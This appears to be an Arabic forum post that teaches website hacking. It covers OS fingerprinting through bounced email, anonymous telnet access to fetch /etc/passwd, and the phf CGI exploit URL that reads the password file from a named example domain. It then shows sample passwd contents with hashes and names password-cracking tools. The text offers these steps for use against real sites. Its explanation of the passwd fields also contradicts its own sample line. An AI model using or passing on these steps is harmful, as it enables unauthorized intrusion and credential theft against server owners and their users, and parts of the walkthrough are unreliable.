أطمح أن يستخدم في أشياء نبيلة

    • أطمح أن يستخدم في أشياء نبيلة

      طمح ان يستخدم في اشياء نبيله
      اطمح ان يستخدم في اشياء نبيله
      اطمح ان يستخدم في اشياء نبيله
      كيفية أختراق المواقع بالتفصيل
      (( نبذه . معلومه . اختراق المواقع يسأله الكثير

      إختراق المواقع ماهو الا شئ بسيط ، نعم بسيط ولكن في حاله واحده وهي :
      أن تتعرف على نظام التشغيل لسيرفر وهي مسأله في غايه البساطه
      والأمر الثاني ان تكون عالما بالثغرات الموجوده فيه ، وتكون المسأله صعبه إذا كنت تريد تريد إختراق مواقع كبيره ومشهوره ولها هيبه وحمايه عاليه حيث أنك في هذه الحاله سوف تنسى الثغرات الموجوده عندك عن النظام الخادم لهذا الموقع لأن وبالتأكيد قد رقعت وعليك أن تفكر في إكتشاف ثغره في هذا الموقع لتخترقه وهذه الناحيه لن أتحدث عنها لأني لا أعرفها عن شيء ، ولكن سوف نتحدث عن البيسك سيرفر هو السيرفر الخادم لأكثر المواقع العربيه وهو سيرفر بسيط في الحمايه ,,,
      =====
      لإختراق هذا النوع من السيرفرات عليك التعرف على نظام التشغيل له ويتم ذلك من عده طريق لتعرف عليه
      مثلا نريد اختراق الموقع

      kondor.com
      وهذا موقع ليس مجاني بل هو نطاق له سيرفر ورقم آي بي ثابت وهذا شئ معلوم لدى الجميع
      نرسل رساله الى عنوان بريدي خاطئ الى هذا السيرفر وسوف يرد عليك بأن هذا البريد غير موجود في الموقع والبريد مثلا هو

      hgguutujfkerh@kondor.com
      وهو بالفعل غير موجود في الموقع عنوان بريد بالإسم هذا ، من خلال الرساله التي وصلتك تخبركبأن عنوان البريد هذا غير موجود تستطيع التعرف من خلالها على نظام الموقع ، وهذه واحده من الطرق
      ثانيا عليك الآن وبعد معرفه نظام التشغيل لهذا الموقع أن تبحث عن الثغرات له
      ////////////
      ////////////
      ملاحظه مهمه
      ////////////
      ////////////
      قد يخترق أحد المواقع ويكون السبب ليس نظام التشغيل ، بل يكون أحد البرامج المثبته عليه مثل ملفات سي حي آي وقد تستخدم لجلب ملف الباسورد المسمى دائما بـ passwd وهناك حادثه مثل هذه في إصدارات WWWThreads للمنتديات

      ـــــــــــــ

      لنفرض انك تبي تخترق سيرفر بسيط وقليل الأمن وهذا النوع منتشر بكثره بكثره نعم بكثره ، عندها سوف يكون إختراق هذا النوع والحصول على الباسورد فايل امر في غايه البساطه نعم في غايه البساطه ولاداعي بعد ان تخترق بأن تقول لمن يطلب منك جواب لسؤال .. كيف ؟ ان ترد عليه بأن العمليه معقده وهذا الرد كاذب
      مثلا أدخل على السيرفر في وضع التخفي
      anonymously (( إستخدم التلنت في هذه الخطوه ))
      وانظر الى المجلد المسمى بـ
      etc
      وأطلب الملف
      passwd
      هل رأيت ... هي عمليه بسيطه ولكن قف ! الملف يحتوي على كلم السر الخاصه بالموقع وغسماء المستخدمين للسيرفر وكلماتهم السريه ولكن كلماتهم السريه تكون مشفره

      طريقه أخرى لإختراق هذا النوع من السيرفرات

      أبحث في الموقع المستهدف من خلال المتصفح عن يا ترى وجود سي جي آي
      عند توفره أطلب الملف التالي
      cgi-bin/phf?Qalias=x
      /bin/cat /etc/passwd
      مثلا عنوان الموقع هو
      kondor.com

      نكتب هكذا
      kondor.com/cgi-bin/phf?Qalias=x
      /bin/cat /etc/passwd
      عندها سوف يرسل لك الملف
      passwd
      وسوف يكون في الملف إسماء وكلمات السر المرخص لهم دخول السيرفر ولكن قف

      هناك أمر حيرني كثيرا وجاب لي بعض الاخوان
      وحيث اني ذهبت لتصميم برامج لفك التشفير عن كلمات السر فهي مشفره وأنتهى الأمر بي البرنامج الذي صمم على يد أحدهم !

      الآن سوف أضع أسئله وأجوبه لتسهل الفهم
      س: ما الملف
      passwd
      وهل الحصول عليها يعتبر من الأشياء المسموح عرضها ؟
      ج: الملف
      passwd
      يحتوي كلمات السر وأسماء المستخدمين المسموح لهم دخول جهاز السيرفر وهو غير مسموح بعرضه ولكن هناك ثغرات وطرق ذكرنا بعضها أو القليل منا وسوف نذكر أكثر ، المهم عند حصولك على الملف سوف تشاهد مكتوب فيه هكذا مثلا


      Sources Code - شفرة

      root:x:0:1:0000-Admin(0000):/:/bin/ksh
      daemon:x:1:1:0000-Admin(0000):/:
      bin:x:2:2:0000-Admin(0000):/usr/bin:
      listen:x:37:4:Network Admin:/usr/net/nls:nobody:x:60001:60001:uid
      nobody:/:noaccess:x:60002:60002:uid noaccess:/:
      ftp:x:101:4:
      FTPUser:/export/home/ftp:
      kondor:yu&rte6745kd:4:RichardClark:/export/home/kondor



      إحنا علينا من السطر هذا
      kondor:yu&rte6745kd:4:RichardClark:/export/home/kondor
      ولتفسيره نقول بأن
      إسم المستخدم هو
      kondor
      وكلمه السر المشفره .. حط خطين تحت كلمه مشفره هي
      yu&rte6745kd
      وايضا
      User number: 201
      Group Number: 4
      Real Name (usually): Richard Clark
      Home Directory: /export/home/rrc
      Type of Shell: /bin/ksh
      الآن فهمنا ماذ يعني السطر هذا السطر من الملف passwd
      kondor:yu&rte6745kd:4:RichardClark:/export/home/kondor

      حاولت أن تعرف من هذه شئ
      admin sign in:/:/bin/csh
      sysadm:ufcNtKNYj7m9I:0:0:
      Regular Admin login:/admin:/sbin/sh
      bin:*:2:2:Admin :/bin:
      sys:*:3:3:Admin :/usr/src:
      adm:*:4:4:Admin :/usr/adm:/sbin/sh
      daemon:*:1:1: Daemon Login for daemons needing
      nobody:*:65534:65534::/:
      ftp:*:39:39:FTP guest login:/var/ftp:
      dtodd:yYn1sav8tKzOI:101:100:John Todd:/home/dtodd:/sbin/sh
      joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh

      س : هل اي ثغره تنجح ؟
      ج : لا طبعا ، لابد ان تكون عارفا لأي شئ هذه الثغره ولأي نظام تشغيل وهل يلزم أن يكون مع نظام التشغيل برنامج آخر ليتم الدخول على السيرفر أو على الروت ، وكل هذه المعلومات لابد من توفرها
      مثلا الموقع alsahat.net يعمل على نظام لينكس
      وقد يكون لثغره أن سبق ورقعت

      س : هل يختلف تشفير كلمه السر من نظام لآخر ؟
      ج : هذا شئ أكيد ...

      س : هل هناك برامج مخصصه لكلمات السر لكل نظام ؟
      ج : نعم ، مثلا برنامجي المفضل لكسر شفرات الكلمات السريه (passwd) لنظام يونكس هو Brute ولكن للأسف أنا لا أملكه الآن وهناك برنامج آخر قد يكون أفضل من سابقه وهو Cracker Jack 1.4
      )(

      تحياتي لكم انا عارف ان البعض لم يفهم شيء بس على الاقل اخذ معلومه
      افضل من لا شيء وتعرفت كيفيت اختراق المواقع
      ( ذي مقدمه نسأل الله التوفيق والنجاح )